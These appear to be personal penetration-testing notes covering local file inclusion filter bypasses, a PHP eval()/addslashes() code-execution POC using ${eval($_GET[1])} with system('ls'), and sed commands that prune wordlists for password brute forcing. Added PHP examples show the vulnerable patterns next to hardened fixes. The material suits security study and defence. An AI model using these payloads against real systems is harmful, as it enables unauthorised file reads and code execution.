Disclaimer: These are my personal notes, published "as-is" without warranty or guarantee of any kind. Use at your own risk. Licensed CC BY-NC-SA 4.0.

Local file inclusion #

  • A filter that only strips or matches the literal ../ can often be bypassed with a variant that is normalised back to ../ after the check: the doubled slash ..// (the filesystem collapses // to /), URL encoding such as %2e%2e/ or ..%2f (when the check runs on the still-encoded value), or ....// (a single non-recursive strip of ../ leaves ../ behind)
  • e.g. /uploads/%2e%2e/%2fsys/class/net/eth0/address or /uploads/..//sys/class/net/eth0/address (the interface MAC address: world-readable, one line, and confirms the include without touching /etc/passwd)
  • Resolve a network path = http://host.tld/?page=// (a path starting with // can be treated as a network/UNC share path rather than a local file, so the server connects out to resolve it)
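
As an added example in PHP (not code from the original notes): the single-pass ../ strip the first bullet describes, the constructed payloads that do and do not survive it, and a resolver that canonicalises the path and checks it stays under a hypothetical PAGES_DIR instead of trying to sanitise the input.

```php
<?php
// Added example, not code from the original notes.
// PAGES_DIR is a hypothetical include root; the payload strings are constructed.
const PAGES_DIR = '/var/www/html/pages';

// The "../-specific find/replace" from the notes: one non-recursive pass.
function naive_filter(string $page): string
{
    return str_replace('../', '', $page);
}

// What reaches include() after the filter, for a few constructed payloads:
//   "../../../../etc/passwd"               -> "etc/passwd"               (blocked)
//   "....//....//....//....//etc/passwd"   -> "../../../../etc/passwd"   (bypass)
//   "%2e%2e/%2fsys/class/net/eth0/address"  -> bypasses only if the filter runs on the
//                                             raw, still-encoded value ($_GET is already decoded)
// Vulnerable usage for comparison:
//   include PAGES_DIR . '/' . naive_filter($_GET['page']);

// Hardened: canonicalise first, then check the result is still inside PAGES_DIR.
function resolve_page(string $page): ?string
{
    if (strpos($page, "\0") !== false) {
        return null;                                // null byte: PHP 8 realpath() throws on it
    }
    $root = realpath(PAGES_DIR);
    $real = realpath(PAGES_DIR . '/' . $page);     // false for missing files, php:// etc.
    if ($root === false || $real === false) {
        return null;
    }
    if (strncmp($real, $root . '/', strlen($root) + 1) !== 0) {
        return null;                                // resolved outside the include root (symlinks included)
    }
    if (pathinfo($real, PATHINFO_EXTENSION) !== 'php') {
        return null;                                // only include page scripts
    }
    return $real;
}

$target = resolve_page($_GET['page'] ?? 'home.php');
if ($target === null) {
    http_response_code(404);
    exit('not found');
}
include $target;
```

realpath() resolves .. segments, doubled slashes and symlinks before the prefix check runs, so the encoding and doubled-slash tricks above have nothing left to bypass; the extension check additionally stops uploads/ content from being included even when it sits under the root.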

PHP - Bypass eval() with addslashes() #

Where a request parameter is wrapped in a double-quoted string literal, run through addslashes() and then eval()'d. addslashes() only escapes quotes, backslashes and NUL, so the literal cannot be closed, but eval() still interpolates ${...} inside a double-quoted string, and $_GET[1] needs no quotes because the key is an integer. The second parameter carries the code to run.

POC: ?str=${eval($_GET[1])}&1=phpinfo();

For example: GET /?format=${eval($_GET[1])}&1=system('ls');
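
As an added example in PHP (not code from the original notes): the vulnerable addslashes()-then-eval() pattern the POC targets, with the payload traced through, next to a replacement that substitutes placeholders without evaluating anything. The 'format' parameter name and the {name} placeholder syntax of render_safe() are assumptions for illustration.

```php
<?php
// Added example, not code from the original notes. The 'format' parameter and the
// placeholder syntax of render_safe() are assumptions for illustration.

// Vulnerable pattern: the request value is wrapped in a double-quoted literal and eval()'d.
// addslashes() stops the literal from being closed, but eval() still interpolates
// "${...}" inside double quotes, so code runs without a single quote in the payload.
function render_vulnerable(string $format): string
{
    $code = '$out = "' . addslashes($format) . '";';
    // ?format=${eval($_GET[1])}&1=system('ls');  becomes
    //   $out = "${eval($_GET[1])}";
    // eval($_GET[1]) runs while the string is built; $_GET[1] needs no quotes because
    // its key is an integer, so addslashes() changes nothing in the payload.
    eval($code);
    return $out;
}

// Fix: never execute user-controlled text. Substitute an allow-listed set of placeholders.
function render_safe(string $format, array $vars): string
{
    $map = [];
    foreach ($vars as $name => $value) {
        $map['{' . $name . '}'] = (string) $value;
    }
    return strtr($format, $map);                    // plain string replacement, no evaluation
}

if (PHP_SAPI === 'cli') {
    // Constructed request mirroring the POC; echo stands in for system('ls').
    $_GET = ['format' => '${eval($_GET[1])}', 1 => 'echo "injected code ran\n";'];
    render_vulnerable($_GET['format']);             // prints: injected code ran
    echo render_safe('${eval($_GET[1])} {user}', ['user' => 'alice']), PHP_EOL;
    // prints the payload text literally, followed by alice
}
```

Run with php on the command line to see the injected echo fire. On PHP 8.2 and later the ${expr} interpolation form is deprecated and the interpreter prints a deprecation notice (plus an undefined-variable warning once eval() returns null), but the injected code still executes, which is the point: the only fix is to stop passing user input through eval().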

Command injection #

Brute forcing #

If we know the password rules, prune the wordlist to candidates that could satisfy them (GNU sed; -i edits in place, so work on a copy):

sed -ri '/^.{,7}$/d' words.txt                 # drop words shorter than 8 characters
sed -ri '/[!-/:-@\[-`\{-~]+/!d' words.txt      # drop words with no ASCII special character (the four ranges cover all punctuation from ! to ~)
sed -ri '/[0-9]+/!d' words.txt                 # drop words with no digit